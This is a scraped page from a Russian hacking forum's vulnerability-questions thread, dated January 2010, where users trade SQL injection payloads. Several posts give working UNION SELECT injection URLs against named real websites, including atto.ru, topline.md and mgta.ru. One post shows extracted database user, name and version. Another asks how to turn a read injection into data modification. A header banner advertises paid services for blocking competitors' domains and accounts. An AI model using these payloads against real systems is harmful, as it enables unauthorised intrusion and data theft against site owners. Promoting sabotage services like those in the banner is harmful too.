УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1108 из 1393

1108

Опции темы

Поиск в этой теме

Опции просмотра

#11071

04.01.2010, 19:27

aka_zver

Постоянный

Регистрация: 17.09.2009

Сообщений: 775

Провел на форуме:
3132379

Репутация: 1069

Отправить сообщение для aka_zver с помощью ICQ

Отправить сообщение для aka_zver с помощью AIM

Отправить сообщение для aka_zver с помощью MSN

Отправить сообщение для aka_zver с помощью Yahoo

я с подобным раньше не сталкивался:

http://web.atto.ru/catalog_new/catal...ar&CODE=211259

если подставить кавычку, то эрроры будут и от mssql и от mysql, как это ?
и возможно ли из этого что-то извлечь полезное (имя БД, юзера, версию, а то как ни пробовал, не получается) ?

#11072

04.01.2010, 20:27

aka_zver

Постоянный

Регистрация: 17.09.2009

Сообщений: 775

Провел на форуме:
3132379

Репутация: 1069

Цитата:

Сообщение от Strilo4ka

пути

а mssql и mysql одновременно, это как ?

#11073

04.01.2010, 20:31

mailbrush

Познавший АНТИЧАТ

Регистрация: 24.06.2008

Сообщений: 1,996

Провел на форуме:
6075534

Репутация: 2731

Отправить сообщение для mailbrush с помощью ICQ

А что здесь странного? Разве то, что об этом нигде не писалось, но все возможно. Все зависит от скрипта, в котором могут быть и все СУБД одновременно.

#11074

04.01.2010, 20:39

aka_zver

Постоянный

Регистрация: 17.09.2009

Сообщений: 775

Провел на форуме:
3132379

Репутация: 1069

Цитата:

скрипт с 2 СУБД поидеи работает и все, ничего тут странного .

только что нашел на atto домене

Цитата:

http://smarthome.atto.ru/index.php?page=news&act=view&id=378+union+select+1 ,2,concat_ws(0x3a,user(),data base(),version(),@@version_compile_os),4,5--+

atto@localhost:atto_new:4.1.22-log

ortbld-freebsd6.2

Спасибо =)

#11075

04.01.2010, 20:56

Gorev

Познавший АНТИЧАТ

Регистрация: 31.03.2006

Сообщений: 1,167

Провел на форуме:
4072944

Репутация: 1550

Отправить сообщение для Gorev с помощью ICQ

Отправить сообщение для Gorev с помощью Yahoo

Уважаемые форучане, нужна ваша помощь в данной иньекции..по мне так стоит фильтр на лимит и на скобки.... подсобите пожайлуста..
http://topline.md/products.php?idproduct=-8819/**/UNION/**/SELECT/**/1,2,3,table_name,5,6,7,8,9/**/from/**/information_schema.tables/**/%23&idcat=1

#11076

04.01.2010, 21:00

Pashkela

Динозавр

Регистрация: 10.01.2008

Сообщений: 2,841

Провел на форуме:
9220514

Репутация: 3338

Отправить сообщение для Pashkela с помощью ICQ

http://topline.md/products.php?idproduct=-8819/**/UNION/**/SELECT/**/1,2,3,table_name,5,6,7,8,9/**/from/**/information_schema.tables/**/limit/**/1,1/**/%23&idcat=1

не понял трабла (хотя со скобками да, заморочка какая-то)

PS: СНГ )

Последний раз редактировалось Pashkela; 04.01.2010 в 21:03..

#11077

04.01.2010, 21:02

Gorev

Познавший АНТИЧАТ

Регистрация: 31.03.2006

Сообщений: 1,167

Провел на форуме:
4072944

Репутация: 1550

Pashkela извини.. что то я тормознул...большое спасибо

#11078

04.01.2010, 23:00

ZavuloN

Новичок

Регистрация: 27.02.2007

Сообщений: 8

Провел на форуме:
29882

Репутация: 0

А можно ли вставить подзапрос модификации в инъекцию select?
Привелегий на запись файлов нет, привелегий на чтение файлов нет...
Хотелось бы выполнить insert или update..

База MySQL, 5.0.70

Последний раз редактировалось ZavuloN; 04.01.2010 в 23:06..

#11079

04.01.2010, 23:32

Jerri

Участник форума

Регистрация: 12.07.2009

Сообщений: 158

Провел на форуме:
2510517

Репутация: 334

Отправить сообщение для Jerri с помощью ICQ

Цитата:

http://mgta.ru/struct/faculty/psychology/030301%27+an d+1='1/

http://mgta.ru/struct/faculty/psychology/030301%27%20union%20select%201%20--%20/ и так далее.

#11080

04.01.2010, 23:33

ZavuloN

Новичок

Регистрация: 27.02.2007

Сообщений: 8

Провел на форуме:
29882

Репутация: 0

Цитата:

Сообщение от Strilo4ka

кстати меня єтот вопрос тоже волнует !!!
поидеи можно но я такое не встречал , допустим если много запросов через разделять
какие то дополнительные разширения или ХЗ

Разделение через точку запятой это для MsSQL, mysql из php так не может, да и из остальных помоему тоже. Хотелось бы что нибудь типа on duplicate key, только для selecta. Интересно, нет никакого on error?

Страница 1108 из 1393

1108

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Форумы	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход